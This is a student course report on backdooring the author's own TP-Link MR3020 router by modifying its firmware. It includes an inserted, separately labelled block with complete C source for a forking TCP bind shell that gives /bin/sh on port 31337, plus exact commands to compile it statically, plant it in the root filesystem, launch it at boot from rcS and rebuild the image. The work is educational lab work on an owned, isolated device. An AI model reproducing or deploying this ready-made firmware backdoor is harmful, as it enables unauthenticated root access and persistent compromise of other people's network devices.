ITKST6400 - Miniproject - Backdooring a TP-Link MR3020 router

Arttu Ylä-Sahra

17 December 2018

Arttu Ylä-Sahra, eearyla@student.jyu.fi


Introduction

1.1 What’s this?


This document is the documentation for the ITKST6400 course mini-project.

Background

In this project, I will be backdooring a device I own, a basic TP-Link
MR3020 wireless router. This unit has been unused for years, and hasn't
served much useful purpose - until now.

This project is very much inspired by the work of Osanda Malith, in particular
his blog post How to Turn Your Switch into a Snitch, and walks through the
steps of executing a similar action. Also (semi-seriously speaking), all IT
security enthusiasts should own at least one device which they have personally
backdoored; creating and using such a device is indeed an educational
experience.
The original plan was to look for exploits, but it turned out that the
version I had was different from what I thought it was, and that idea fell
through. However, I thought, why not make my own..
For this task, a freshly installed and upgraded Kali Linux 2018 instance
will be used. This file documents the steps taken to create a backdoored but
otherwise fully functional router.

Determining the appropriate firmware version

The first step is determining the appropriate version to start with. As far
as I know, TP-Link devices differ across regions, and it cannot be said for
sure what is appropriate for a given device without inspecting the device
itself.
This is accomplished by connecting the device to a special test setup, as
seen here. My personal network configuration allows me to give the router
isolated access, so that it cannot reach the "secure"/LAN network from the
IoT/"Proxmox" network. It does provide an Internet connection, though, so it
can easily be used for practical testing.
Ensuring the router is in 3G/4G mode, which makes it operate as a NATing
router, I log in using the default credentials (having factory reset the router
beforehand), and quickly find the correct version details.

Hmm.. 3.17.2 Build 140610 Rel 65031n, HW version MR3020 V1 00000000. More
precisely, looking at the device itself, V1.9. Seems like we now know what we
are looking for. Let's next get started with Firmware Mod Kit, taking the
latest available firmware version, TL-MR3020_V1_150921.
One has to be careful here: there are multiple hardware versions in
existence, and my particular unit is one of the older ones!

Uncapping firmware

A few moments later, and.. the firmware seems to have been extracted
appropriately; the extracted FW files and the original file are included in
the ZIP file for inspection.
So, we need a MIPS cross-compiler. Additional research from OpenWRT
(https://openwrt.org/toh/hwdata/tp-link/tp-link_tl-mr3020_v1) indicates
the correct MIPS architecture is 24Kc, the CPU being an Atheros AR9331.
Let's get a http://buildroot.org toolchain, as we need to compile a
user-mode application. https://wikidevi.com/wiki/MIPS_24K indicates that
the appropriate Buildroot architecture selection is MIPS32R2, in big-endian
format. This confirms that what the file command told us is in fact entirely
correct.

Configuring with make menuconfig and then running make toolchain should give
us a valid, working toolchain. I also had to select 2.6.31 as the kernel
headers version to ensure that programs will build appropriately for the
device's old kernel.
Building a toolchain took an extraordinarily, if not excessively, long
time, apparently because it had to complete a significant amount of
configuration and compilation work. And it still failed the first time.

I do not have the time or patience to start diagnosing uClibc issues. Let's
try musl instead.

YES! This looks more like it. Let's add that to the path.. and compile a
little test program.

Good. This proves our compiler works, although we will need to use a
statically compiled program, as in the blog post, due to the fact that the
MR3020 uses uClibc and we use musl. These are almost certainly not binary
compatible with each other, so we need a program that runs independently,
without reliance on the system libc. My MIPS assembly skills are very weak, so
we must accept the trade-off of a larger program size for now.

Backdooring the firmware

Due to, again, time constraints (I'm overdue for a vacation!), we are going
to settle for a simple TCP shell listening on a port. Not the most refined
method, but highly effective in allowing further tampering. The full source of
this shell (including appropriate credits) will be included in the attached
ZIP file.
After an hour or so of bodging, I have a functional TCP shell.

And with a few more commands, it is also neatly cross-compiled so that it
does not depend on any dynamic libraries, and stripped to reduce its size.

To insert this backdoor, we copy it into /bin/mips_shell and insert our
command into /etc/rc.d/rcS, right after the HTTP daemon starts.
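The listening shell, its static cross-compilation and its installation into the extracted firmware, as one added example. This is not the author's shell from the ZIP (the report does not reproduce its source) but an illustration of the same technique. The toolchain prefix mips-linux-musl-, the port 31337 and the fmk/rootfs path are assumptions; so is the forking design: the report does not say why the author's first shell crashed, so the fork-per-connection, SIGCHLD/SIGPIPE handling and SO_REUSEADDR below are general robustness measures, not a diagnosis of that crash.

```c
/*
 * Minimal forking TCP bind shell for a MIPS32R2 big-endian target such as
 * the MR3020 (added example, not the report's own code).
 *
 * Assumptions (none of these are stated in the report):
 *   - toolchain prefix mips-linux-musl- from the Buildroot musl toolchain
 *   - listening port 31337
 *   - Firmware Mod Kit extracted the image into fmk/ (rootfs under fmk/rootfs)
 *
 * Build statically: the device libc is uClibc, the toolchain's is musl.
 *   mips-linux-musl-gcc -static -Os -s -o mips_shell bindshell.c
 * Install into the extracted firmware and start it from rcS:
 *   cp mips_shell fmk/rootfs/bin/mips_shell
 *   chmod 755 fmk/rootfs/bin/mips_shell
 *   # in fmk/rootfs/etc/rc.d/rcS, after the line that starts the HTTP daemon:
 *   #   /bin/mips_shell &
 *   ./build-firmware.sh fmk
 */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define SHELL_PORT 31337   /* assumed; the report does not name its port */

/* Fill in an IPv4 wildcard address for a host-order port. Kept separate from
 * the socket calls so the byte-order handling can be checked on its own;
 * htons() does the right thing on both the x86 host and big-endian MIPS. */
int bindshell_addr(struct sockaddr_in *sa, unsigned short port)
{
    if (sa == NULL)
        return -1;
    memset(sa, 0, sizeof *sa);
    sa->sin_family = AF_INET;
    sa->sin_port = htons(port);
    sa->sin_addr.s_addr = htonl(INADDR_ANY);
    return 0;
}

/* Create, bind and listen. Returns the listening fd, or -1 on failure.
 * SO_REUSEADDR lets the listener come back right after a restart instead of
 * failing on a socket still in TIME_WAIT. */
int bindshell_listen(unsigned short port)
{
    struct sockaddr_in sa;
    int one = 1;
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one);
    if (bindshell_addr(&sa, port) < 0 ||
        bind(fd, (struct sockaddr *)&sa, sizeof sa) < 0 ||
        listen(fd, 4) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Hand one accepted connection to a forked child running an interactive
 * /bin/sh. The parent returns to accept(), so a shell that exits or crashes
 * only costs its own child, never the listener. Returns the child pid or -1. */
int bindshell_serve(int client)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        dup2(client, 0);
        dup2(client, 1);
        dup2(client, 2);
        if (client > 2)
            close(client);
        execl("/bin/sh", "sh", "-i", (char *)NULL);
        _exit(127);                     /* exec failed */
    }
    close(client);                      /* parent keeps only the listener */
    return (int)pid;
}

int main(void)
{
    int fd;
    signal(SIGCHLD, SIG_IGN);           /* reap finished shells automatically */
    signal(SIGPIPE, SIG_IGN);           /* a client dropping must not kill us */
    fd = bindshell_listen(SHELL_PORT);
    if (fd < 0) {
        perror("bindshell_listen");
        return 1;
    }
    for (;;) {
        int client = accept(fd, NULL, NULL);
        if (client < 0)
            continue;
        bindshell_serve(client);
    }
}
```

With -static the binary carries musl's own libc and never touches the router's uClibc, which is exactly the trade-off the text accepts (a bigger file in exchange for not depending on the system libraries). Before it goes into the image, `file mips_shell` on the host should report a statically linked, big-endian (MSB) MIPS32 rel2 ELF; anything else means the wrong toolchain or the wrong flags. Nothing here changes the router's WAN-side filtering, so the report's later observation that the port was not reachable from the WAN applies to this shell as well.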

Right, we have now rebuilt our firmware with Firmware Mod Kit..

Hmm.. this is clever. Due to the network configuration, I had to enable
remote management.. but it turns out that logging in remotely blocks firmware
upgrade attempts. Oh well, let's use the mobile phone to upgrade. A (slightly
nervous, as with all firmware upgrades) reboot later, and...
Success! Well, almost: the terminal crashed almost immediately for some
unknown reason.
It also turns out that TP-Link had some good design sense; apparently, even
after disabling the router firewall, it would NOT let me connect to the
expected port from the WAN by default. Well, that could perhaps be fixed by
a firewall setting change, although strangely enough, neither disabling the
firewall nor creating a port forward apparently permitted the connection.
Perhaps it would have needed a restart?

It also seems that the initial shell is fragile in some yet unknown way... a
problem that is more or less easily solved by opening a second sh.

Nevertheless, we now have working root access at our disposal, and this is
one of the most dangerous tools a hacker can have in the case of an embedded
device. Our job is done.
That's about it. The last step is appropriately marking the state of the
router, so that it won't accidentally get mixed up with benign devices.
